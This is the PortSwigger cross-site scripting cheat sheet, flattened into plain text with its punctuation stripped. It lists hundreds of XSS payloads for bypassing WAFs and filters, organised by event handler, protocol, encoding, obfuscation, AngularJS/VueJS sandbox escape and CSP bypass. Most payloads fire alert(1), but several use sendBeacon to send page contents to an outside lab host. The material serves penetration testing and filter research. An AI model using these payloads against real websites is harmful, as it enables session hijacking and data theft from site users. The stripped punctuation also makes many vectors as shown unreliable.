Cross-site scripting (XSS) cheat sheetThis cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters You can select vectors by the event tag orbrowser and a proof of concept is included for every vector This cheat sheet is regularly updated in 2020 Last updated Fri 07 Aug 2020 144908 +0000
Table of contents
Event handlers
Event handlers that do not require user interaction
Event Description Code
onactivate
Fires when the element is activated ltxss id=x tabindex=1 onactivate=alert(1)gtltxssgtCompatibility
onafterprint
Fires after the page is printed ltbody onafterprint=alert(1)gtCompatibility
onafterscriptexecute
Fires after script is executed ltxss onafterscriptexecute=alert(1)gtltscriptgt1ltscriptgtCompatibility
onanimationcancel
Fires when a CSS animation cancels ltstylegtkeyframes xfrom left0to left 1000pxtarget animation10s ease-in-out 0s 1 xltstylegtltxss id=x style=positionabsolute onanimationcancel=alert(1)gtltxssgt
Compatibility
onanimationend
Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onanimationend=alert(1)gtltxssgt
Compatibility
onanimationiteration
Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onanimationiteration=alert(1)gtltxssgt
Compatibility
onanimationstart
Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onanimationstart=alert(1)gtltxssgt
Compatibility
onbeforeactivate
Fires before the element is activated ltxss id=x tabindex=1 onbeforeactivate=alert(1)gtltxssgtCompatibility
onbeforedeactivate
Fires before the element is deactivated ltxss id=x tabindex=1 onbeforedeactivate=alert(1)gtltxssgtltinput autofocusgtCompatibility
onbeforeprint
Fires before the page is printed ltbody onbeforeprint=alert(1)gtCompatibility
onbeforescriptexecute
Fires before script is executed ltxss onbeforescriptexecute=alert(1)gtltscriptgt1ltscriptgtCompatibility
onbeforeunload
Fires after if the url changes ltbody onbeforeunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onbegin
Fires when a svg animation begins ltsvggtltanimate onbegin=alert(1) attributeName=x dur=1sgtCompatibility
onblur
Fires when an element loses focus lta onblur=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility
onbounce
Fires when the marquee bounces ltmarquee width=1 loop=1 onbounce=alert(1)gtXSSltmarqueegtCompatibility
oncanplay
Fires if the resource can be played ltaudio oncanplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
oncanplaythrough
Fires when enough data has been loadedto play the resource all the way through
ltvideo oncanplaythrough=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt
Compatibility
oncuechange
Fires when subtitle changes ltvideo controlsgtltsource src=validvideomp4 type=videomp4gtlttrack default oncuechange=alert(1) src=datatextvttWEBVTT FILE 1 000000000 --gt 000005000 ltbgtXSSltbgt gtltvideogt
Compatibility
ondeactivate
Fires when the element is deactivated ltxss id=x tabindex=1 ondeactivate=alert(1)gtltxssgtltinput id=y autofocusgtCompatibility
ondurationchange
Fires when duration changes ltaudio controls ondurationchange=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt
Compatibility
onend
Fires when a svg animation ends ltsvggtltanimate onend=alert(1) attributeName=x dur=1sgtCompatibility
onended
Fires when the resource is finishedplaying
ltaudio controls autoplay onended=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onerror
Fires when the resource fails to load orcauses an error
ltaudio srconerror=alert(1)gtCompatibility
onfinish
Fires when the marquee finishes ltmarquee width=1 loop=1 onfinish=alert(1)gtXSSltmarqueegtCompatibility
onfocus
Fires when the element has focus lta id=x tabindex=1 onfocus=alert(1)gtltagtCompatibility
onfocusin
Fires when the element has focus lta id=x tabindex=1 onfocusin=alert(1)gtltagtCompatibility
onfocusout
Fires when an element loses focus lta onfocusout=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility
onhashchange
Fires if the hash changes ltbody onhashchange=alert(1)gtCompatibility
onload
Fires when the element is loaded ltbody onload=alert(1)gtCompatibility
onloadeddata
Fires when the first frame is loaded ltaudio onloadeddata=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onloadedmetadata
Fires when the meta data is loaded ltaudio autoplay onloadedmetadata=alert(1)gt ltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onloadend
Fires when the element finishes loading ltimage src=validimagepng onloadend=alert(1)gtCompatibility
onloadstart
Fires when the element begins to load ltimage src=validimagepng onloadstart=alert(1)gtCompatibility
onmessage
Fires when message event is receivedfrom a postMessage call
ltbody onmessage=alert(1)gtCompatibility
onpageshow
Fires when the page is shown ltbody onpageshow=alert(1)gtCompatibility
onplay
Fires when the resource is played ltaudio autoplay onplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onplaying
Fires the resource is playing ltaudio autoplay onplaying=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpopstate
Fires when the history changes ltbody onpopstate=alert(1)gtCompatibility
onprogress
Fires when the videoaudio beginsdownloading
ltaudio controls onprogress=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt
Compatibility
onreadystatechange
Fires when the ready state changes ltapplet onreadystatechange=alert(1)gtltappletgtCompatibility
onrepeat
Fires when a svg animation repeats ltsvggtltanimate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 gtCompatibility
onresize
Fires when the window is resized ltbody onresize=alert(1)gtCompatibility
onscroll
Fires when the page scrolls ltbody onscroll=alert(1)gtltdiv style=height1000pxgtltdivgtltdiv id=xgtltdivgtCompatibility
onstart
Fires when the marquee starts ltmarquee onstart=alert(1)gtXSSltmarqueegtCompatibility
ontimeupdate
Fires when the timeline is changed ltaudio controls autoplay ontimeupdate=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
ontoggle
Fires when the details tag is expanded ltdetails ontoggle=alert(1) opengttestltdetailsgtCompatibility
ontransitioncancel
Fires when a CSS transition cancels ltstylegttarget color redltstylegtltxss id=x style=transitioncolor 10s ontransitioncancel=alert(1)gtltxssgt
Compatibility
ontransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionend=alert(1)gtltxssgt
Compatibility
ontransitionrun
Fires when a CSS transition begins ltstylegttarget transform rotate(180deg)ltstylegtltxss id=x style=transitiontransform 2s ontransitionrun=alert(1)gtltxssgt
Compatibility
ontransitionstart
Fires when a CSS transition starts ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionstart=alert(1)gtltxssgt
Compatibility
onunhandledrejection
Fires when a promise isnt handled ltbody onunhandledrejection=alert(1)gtltscriptgtfetch(xyz)ltscriptgtCompatibility
onunload
Fires when the page is unloaded ltbody onunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onwaiting
Fires when while waiting for the data ltvideo autoplay controls onwaiting=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt
Compatibility
onwebkitanimationend
Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationend=alert(1)gtltxssgt
Compatibility
onwebkitanimationiteration
Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onwebkitanimationiteration=alert(1)gtltxssgt
Compatibility
onwebkitanimationstart
Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationstart=alert(1)gtltxssgt
Compatibility
onwebkittransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s onwebkittransitionend=alert(1)gtltxssgt
Compatibility
Event handlers that do require user interaction
Event Description Code
onauxclick
Fires when right clicking or using themiddle button of the mouse
ltinput onauxclick=alert(1)gtCompatibility
onbeforecopy
Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility
onbeforecut
Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility
onbeforepaste
Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility
onchange
Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility
onclick
Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility
onclose
Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt
Compatibility
oncontextmenu
Triggered when right clicking to show thecontext menu
ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility
oncopy
Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
oncut
Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
ondblclick
Triggered when double clicking theelement
ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility
ondrag
Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility
ondragend
Triggered dragging is finished on theelement
ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility
ondragenter
Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility
ondragleave
Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility
ondragover
Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
ondragstart
Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility
ondrop
Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
onfullscreenchange
Fires when a video changes full screenstatus
ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
oninput
Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility
oninvalid
Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute
ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility
onkeydown
Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility
onkeypress
Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility
onkeyup
Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility
onmousedown
Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility
onmouseenter
Triggered when the mouse is hoveredover the element
ltxss onmouseenter=alert(1)gttestltxssgtCompatibility
onmouseleave
Triggered when the mouse is movedaway from the element
ltxss onmouseleave=alert(1)gttestltxssgtCompatibility
onmousemove
Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility
onmouseout
Triggered when the mouse is movedaway from the element
ltxss onmouseout=alert(1)gttestltxssgtCompatibility
onmouseover
Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility
onmouseup
Triggered when the mouse button isreleased
ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
